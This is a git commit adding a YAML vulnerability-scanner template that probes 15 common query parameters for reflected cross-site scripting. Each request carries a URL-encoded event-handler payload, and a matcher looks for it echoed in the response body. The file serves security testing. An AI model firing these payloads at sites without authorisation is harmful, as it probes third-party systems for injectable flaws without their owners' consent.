added template for xss params
Benjamin Intfeld
parent
e91a4518c2
commit
8f599a4c08
|
|
@ -0,0 +1,36 @@
|
|||
# id contains the unique identifier for the template.
|
||||
id: top-15-xss-parameter
|
||||
|
||||
info:
|
||||
# Name is the name of the template
|
||||
name: Top 15 XSS Parameter Template
|
||||
# Author is the name of the author for the template
|
||||
author: foulenzer
|
||||
# Severity is the severity for the template.
|
||||
severity: medium
|
||||
# Description optionally describes the template.
|
||||
description: Searches for reflected XSS in the server response via GET-requests.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?q=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?s=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?search=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?id=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?action=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?keyword=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?query=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?page=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?keywords=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?url=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?view=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?cat=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?name=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?key=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
- "{{BaseURL}}/?p=%27%3E%22%20%3Ci%20onFoCuS%3DCoNfIrM%281%29%20autofocus%3E1abc"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'>\" <i onFoCuS=CoNfIrM(1) autofocus>1abc"
|
||||
part: body
|
||||
Loading…
Reference in New Issue